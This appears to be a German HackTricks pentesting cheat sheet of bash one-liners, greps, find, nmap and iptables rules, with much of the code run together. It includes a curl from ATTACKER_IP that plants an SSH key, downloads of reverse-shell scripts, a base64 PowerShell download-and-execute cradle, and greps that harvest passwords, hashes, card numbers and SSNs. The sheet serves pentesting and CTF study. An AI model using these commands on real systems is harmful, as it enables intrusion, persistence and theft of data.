Verwenden Sie Trickest, um einfach Workflows zu erstellen und zu automatisieren, die von den fortschrittlichsten Community-Tools der Welt unterstützt werden.
Heute Zugriff erhalten:
Teilen Sie Hacking-Tricks, indem Sie PRs an dieHackTricks und HackTricks Cloud Github-Repositorys senden.
Gemeinsame Bash
#Exfiltration using Base64base64-w0file#Get HexDump without new linesxxd-pboot12.bin|tr-d'\n'#Add public key to authorized keyscurlhttps://ATTACKER_IP/.ssh/id_rsa.pub>>~/.ssh/authorized_keys#Echo without new line and Hexecho-n-e#Countwc-l<file>#Lineswc-c#Chars#Sortsort-nr#Sort by number and then reversecatfile|sort|uniq#Sort and delete duplicates#Replace in filesed-i's/OLD/NEW/g'path/file#Replace string inside a file#Download in RAMwget10.10.14.14:8000/tcp_pty_backconnect.py-O/dev/shm/.rev.pywget10.10.14.14:8000/tcp_pty_backconnect.py-P/dev/shmcurl10.10.14.14:8000/shell.py-o/dev/shm/shell.py#Files used by network processeslsof#Open files belonging to any processlsof-p3#Open files used by the processlsof-i#Files used by networks processeslsof-i4#Files used by network IPv4 processeslsof-i6#Files used by network IPv6 processeslsof-i4-a-p1234#List all open IPV4 network files in use by the process 1234lsof+D/lib#Processes using files inside the indicated dirlsof-i:80#Files uses by networks processesfuser-nvtcp80#Decompresstar-xvzf/path/to/yourfile.tgztar-xvjf/path/to/yourfile.tbzbzip2-d/path/to/yourfile.bz2tarjxffile.tar.bz2gunzip/path/to/yourfile.gzunzipfile.zip7z-xfile.7zsudoapt-getinstallxz-utils; unxzfile.xz#Add new useruseradd-p'openssl passwd -1 <Password>'hacker#Clipboardxclip-selc<catfile.txt#HTTP serverspython-mSimpleHTTPServer80python3-mhttp.serverruby-rwebrick-e"WEBrick::HTTPServer.new(:Port => 80, :DocumentRoot => Dir.pwd).start"php-S $ip:80#Curl#json datacurl --header "Content-Type: application/json" --request POST --data '{"password":"password", "username":"admin"}' http://host:3000/endpoint
#Auth via JWTcurl-XGET-H'Authorization: Bearer <JWT>'http://host:3000/endpoint#Send EmailsendEmail -t to@email.com -f from@email.com -s 192.168.8.131 -u Subject -a file.pdf #You will be prompted for the content
#DD copy hex bin file without first X (28) bytesddif=file.binbs=28skip=1of=blob#Mount .vhd files (virtual hard drive)sudoapt-getinstalllibguestfs-toolsguestmount--addNAME.vhd--inspector--ro/mnt/vhd#For read-only, create first /mnt/vhd# ssh-keyscan, help to find if 2 ssh ports are from the same host comparing keysssh-keyscan10.10.10.101# Opensslopenssls_client-connect10.10.10.127:443#Get the certificate from a serveropensslx509-inca.cert.pem-text#Read certificateopensslgenrsa-outnewuser.key2048#Create new RSA2048 keyopenssl req -new -key newuser.key -out newuser.csr #Generate certificate from a private key. Recommended to set the "Organizatoin Name"(Fortune) and the "Common Name" (newuser@fortune.htb)
opensslreq-x509-newkeyrsa:4096-keyoutkey.pem-outcert.pem-days365-nodes#Create certificateopenssl x509 -req -in newuser.csr -CA intermediate.cert.pem -CAkey intermediate.key.pem -CAcreateserial -out newuser.pem -days 1024 -sha256 #Create a signed certificate
openssl pkcs12 -export -out newuser.pfx -inkey newuser.key -in newuser.pem #Create from the signed certificate the pkcs12 certificate format (firefox)
# If you only needs to create a client certificate from a Ca certificate and the CA key, you can do it using:opensslpkcs12-export-inca.cert.pem-inkeyca.key.pem-outclient.p12# Decrypt ssh keyopensslrsa-inkey.ssh.enc-outkey.ssh#Decryptopensslenc-aes256-k<KEY>-d-inbackup.tgz.enc-outb.tgz#Count number of instructions executed by a program, need a host based linux (not working in VM)perfstat-x,-einstructions:u"ls"#Find trick for HTB, find files from 2018-12-12 to 2018-12-14find / -newermt 2018-12-12 ! -newermt 2018-12-14 -type f -readable -not -path "/proc/*" -not -path "/sys/*" -ls 2>/dev/null
#Reconfigure timezonesudodpkg-reconfiguretzdata#Search from which package is a binaryapt-filesearch/usr/bin/file#Needed: apt-get install apt-file#Protobuf decode https://www.ezequiel.tech/2020/08/leaking-google-cloud-projects.htmlecho"CIKUmMesGw=="|base64-d|protoc--decode_raw#Set not removable bitsudochattr+ifile.txtsudochattr-ifile.txt#Remove the bit so you can delete it# List files inside zip7zlfile.zip
Verwenden Sie Trickest, um einfach Workflows zu erstellen und zu automatisieren, die von den fortschrittlichsten Community-Tools der Welt unterstützt werden.
Heute Zugriff erhalten:
#Base64 for Windowsecho -n "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.9:8000/9002.ps1')" | iconv --to-code UTF-16LE | base64 -w0
#Exe compressionupx-9nc.exe#Exe2batwineexe2bat.exenc.exenc.txt#Compile Windows python exploit to exepipinstallpyinstallerwget-Oexploit.pyhttp://www.exploit-db.com/download/31853pythonpyinstaller.py--onefileexploit.py#Compile for windows#sudo apt-get install gcc-mingw-w64-i686i686-mingw32msvc-gcc-oexecutableuseradd.c
Greps
Grep steht für "Global Regular Expression Print". Es wird verwendet, um Textzeilen zu durchsuchen und nach Mustern zu filtern. Es ist ein leistungsstarkes Werkzeug, um Dateien nach bestimmten Zeichenfolgen zu durchsuchen.
#Extract emails from filegrep-E-o"\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}\b"file.txt#Extract valid IP addressesgrep -E -o "(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)" file.txt
#Extract passwordsgrep-i"pwd\|passw"file.txt#Extract usersgrep-i"user\|invalid\|authentication\|login"file.txt# Extract hashes#Extract md5 hashes ({32}), sha1 ({40}), sha256({64}), sha512({128})egrep-oE'(^|[^a-fA-F0-9])[a-fA-F0-9]{32}([^a-fA-F0-9]|$)'*.txt|egrep-o'[a-fA-F0-9]{32}'>md5-hashes.txt#Extract valid MySQL-Old hashesgrep-e"[0-7][0-9a-f]{7}[0-7][0-9a-f]{7}"*.txt>mysql-old-hashes.txt#Extract blowfish hashesgrep-e"$2a\$\08\$(.){75}"*.txt>blowfish-hashes.txt#Extract Joomla hashesegrep-o"([0-9a-zA-Z]{32}):(w{16,32})"*.txt>joomla.txt#Extract VBulletin hashesegrep-o"([0-9a-zA-Z]{32}):(S{3,32})"*.txt>vbulletin.txt#Extraxt phpBB3-MD5egrep-o'$H$S{31}'*.txt>phpBB3-md5.txt#Extract Wordpress-MD5egrep-o'$P$S{31}'*.txt>wordpress-md5.txt#Extract Drupal 7egrep-o'$S$S{52}'*.txt>drupal-7.txt#Extract old Unix-md5egrep-o'$1$w{8}S{22}'*.txt>md5-unix-old.txt#Extract md5-apr1egrep-o'$apr1$w{8}S{22}'*.txt>md5-apr1.txt#Extract sha512crypt, SHA512(Unix)egrep-o'$6$w{8}S{86}'*.txt>sha512crypt.txt#Extract e-mails from text filesgrep-E-o"\b[a-zA-Z0-9.#?$*_-]+@[a-zA-Z0-9.#?$*_-]+.[a-zA-Z0-9.-]+\b"*.txt>e-mails.txt#Extract HTTP URLs from text filesgrephttp|grep-shoP'http.*?[" >]'*.txt>http-urls.txt#For extracting HTTPS, FTP and other URL format usegrep-E'(((https|ftp|gopher)|mailto)[.:][^ >" ]*|www.[-a-z0-9.]+)[^ .,; >">):]'*.txt>urls.txt#Note: if grep returns "Binary file (standard input) matches" use the following approaches # tr '[\000-\011\013-\037177-377]' '.' < *.log | grep -E "Your_Regex" OR # cat -v *.log | egrep -o "Your_Regex"
#Extract Floating point numbersgrep-E-o"^[-+]?[0-9]*.?[0-9]+([eE][-+]?[0-9]+)?$"*.txt>floats.txt# Extract credit card data#Visagrep-E-o"4[0-9]{3}[ -]?[0-9]{4}[ -]?[0-9]{4}[ -]?[0-9]{4}"*.txt>visa.txt#MasterCardgrep-E-o"5[0-9]{3}[ -]?[0-9]{4}[ -]?[0-9]{4}[ -]?[0-9]{4}"*.txt>mastercard.txt#American Expressgrep-E-o"\b3[47][0-9]{13}\b"*.txt>american-express.txt#Diners Clubgrep-E-o"\b3(?:0[0-5]|[68][0-9])[0-9]{11}\b"*.txt>diners.txt#Discovergrep-E-o"6011[ -]?[0-9]{4}[ -]?[0-9]{4}[ -]?[0-9]{4}"*.txt>discover.txt#JCBgrep-E-o"\b(?:2131|1800|35d{3})d{11}\b"*.txt>jcb.txt#AMEXgrep-E-o"3[47][0-9]{2}[ -]?[0-9]{6}[ -]?[0-9]{5}"*.txt>amex.txt# Extract IDs#Extract Social Security Number (SSN)grep-E-o"[0-9]{3}[ -]?[0-9]{2}[ -]?[0-9]{4}"*.txt>ssn.txt#Extract Indiana Driver License Numbergrep-E-o"[0-9]{4}[ -]?[0-9]{2}[ -]?[0-9]{4}"*.txt>indiana-dln.txt#Extract US Passport Cardsgrep-E-o"C0[0-9]{7}"*.txt>us-pass-card.txt#Extract US Passport Numbergrep-E-o"[23][0-9]{8}"*.txt>us-pass-num.txt#Extract US Phone Numberssgrep-Po'd{3}[s-_]?d{3}[s-_]?d{4}'*.txt>us-phones.txt#Extract ISBN Numbersegrep -a -o "\bISBN(?:-1[03])?:? (?=[0-9X]{10}$|(?=(?:[0-9]+[- ]){3})[- 0-9X]{13}$|97[89][0-9]{10}$|(?=(?:[0-9]+[- ]){4})[- 0-9]{17}$)(?:97[89][- ]?)?[0-9]{1,5}[- ]?[0-9]+[- ]?[0-9]+[- ]?[0-9X]\b" *.txt > isbn.txt
Find
Find files owned by a specific user
To find all files owned by a specific user, use the following command:
find/-userusername
Replace username with the username of the user you want to search for.
Find files larger than a specific size
To find files that are larger than a specific size, you can use the following command:
find/-size+100M
This command will find files larger than 100 megabytes. You can adjust the size as needed.
Find files modified in the last N days
To find files that have been modified in the last N days, you can use the following command:
find/-mtime-N
Replace N with the number of days. This command will find files modified in the last N days.
# Find SUID set files.find/-perm/u=s-ls2>/dev/null# Find SGID set files.find/-perm/g=s-ls2>/dev/null# Found Readable directory and sort by time. (depth = 4)find / -type d -maxdepth 4 -readable -printf "%T@ %Tc | %p \n" 2>/dev/null | grep -v "| /proc" | grep -v "| /dev" | grep -v "| /run" | grep -v "| /var/log" | grep -v "| /boot" | grep -v "| /sys/" | sort -n -r
# Found Writable directory and sort by time. (depth = 10)find / -type d -maxdepth 10 -writable -printf "%T@ %Tc | %p \n" 2>/dev/null | grep -v "| /proc" | grep -v "| /dev" | grep -v "| /run" | grep -v "| /var/log" | grep -v "| /boot" | grep -v "| /sys/" | sort -n -r
# Or Found Own by Current User and sort by time. (depth = 10)find / -maxdepth 10 -user $(id -u) -printf "%T@ %Tc | %p \n" 2>/dev/null | grep -v "| /proc" | grep -v "| /dev" | grep -v "| /run" | grep -v "| /var/log" | grep -v "| /boot" | grep -v "| /sys/" | sort -n -r
# Or Found Own by Current Group ID and Sort by time. (depth = 10)find / -maxdepth 10 -group $(id -g) -printf "%T@ %Tc | %p \n" 2>/dev/null | grep -v "| /proc" | grep -v "| /dev" | grep -v "| /run" | grep -v "| /var/log" | grep -v "| /boot" | grep -v "| /sys/" | sort -n -r
# Found Newer files and sort by time. (depth = 5)find / -maxdepth 5 -printf "%T@ %Tc | %p \n" 2>/dev/null | grep -v "| /proc" | grep -v "| /dev" | grep -v "| /run" | grep -v "| /var/log" | grep -v "| /boot" | grep -v "| /sys/" | sort -n -r | less
# Found Newer files only and sort by time. (depth = 5)find / -maxdepth 5 -type f -printf "%T@ %Tc | %p \n" 2>/dev/null | grep -v "| /proc" | grep -v "| /dev" | grep -v "| /run" | grep -v "| /var/log" | grep -v "| /boot" | grep -v "| /sys/" | sort -n -r | less
# Found Newer directory only and sort by time. (depth = 5)find / -maxdepth 5 -type d -printf "%T@ %Tc | %p \n" 2>/dev/null | grep -v "| /proc" | grep -v "| /dev" | grep -v "| /run" | grep -v "| /var/log" | grep -v "| /boot" | grep -v "| /sys/" | sort -n -r | less
Nmap Suchhilfe
#Nmap scripts ((default or version) and smb))nmap--script-help"(default or version) and *smb*"locate-r'\.nse$'|xargsgrepcategories|grep'default\|version\|safe'|grepsmbnmap--script-help"(default or version) and smb)"
Bash
Bash ist die Standard-Shell für die meisten Linux-Systeme. Es bietet viele nützliche Befehle und Funktionen für die Interaktion mit dem Betriebssystem.
#All bytes inside a file (except 0x20 and 0x00)for j in $((for i in {0..9}{0..9} {0..9}{a..f} {a..f}{0..9} {a..f}{a..f}; do echo $i; done ) | sort | grep -v "20\|00"); do echo -n -e "\x$j" >> bytes; done
Iptables
Iptables ist ein leistungsstarkes Firewall-Tool für Linux-Systeme. Es wird verwendet, um den Datenverkehr zu überwachen, zu filtern und zu steuern, der in und aus dem System fließt. Mit Iptables können Regeln erstellt werden, um den Netzwerkverkehr basierend auf verschiedenen Kriterien wie IP-Adresse, Port und Protokoll zu blockieren oder zuzulassen. Es ist ein unverzichtbares Werkzeug für die Absicherung von Linux-Systemen.
#Delete curent rules and chainsiptables--flushiptables--delete-chain#allow loopbackiptables-AINPUT-ilo-jACCEPTiptables-AOUTPUT-olo-jACCEPT#drop ICMPiptables-AINPUT-picmp-micmp--icmp-typeany-jDROPiptables-AOUTPUT-picmp-jDROP#allow established connectionsiptables-AINPUT-mstate--stateRELATED,ESTABLISHED-jACCEPT#allow ssh, http, https, dnsiptables-AINPUT-s10.10.10.10/24-ptcp-mtcp--dport22-jACCEPTiptables-AINPUT-ptcp-mstate--stateNEW-mtcp--dport80-jACCEPTiptables-AINPUT-ptcp-mstate--stateNEW-mtcp--dport443-jACCEPTiptables-AINPUT-pudp-mudp--sport53-jACCEPTiptables-AINPUT-ptcp-mtcp--sport53-jACCEPTiptables-AOUTPUT-pudp-mudp--dport53-jACCEPTiptables-AOUTPUT-ptcp-mtcp--dport53-jACCEPT#default policiesiptables-PINPUTDROPiptables-PFORWARDACCEPTiptables-POUTPUTACCEPT
Teilen Sie Hacking-Tricks, indem Sie PRs an dieHackTricks und HackTricks Cloud github Repositories einreichen.
Verwenden Sie Trickest, um einfach Workflows zu erstellen und zu automatisieren, die von den weltweit fortschrittlichsten Community-Tools unterstützt werden.
Heute Zugriff erhalten: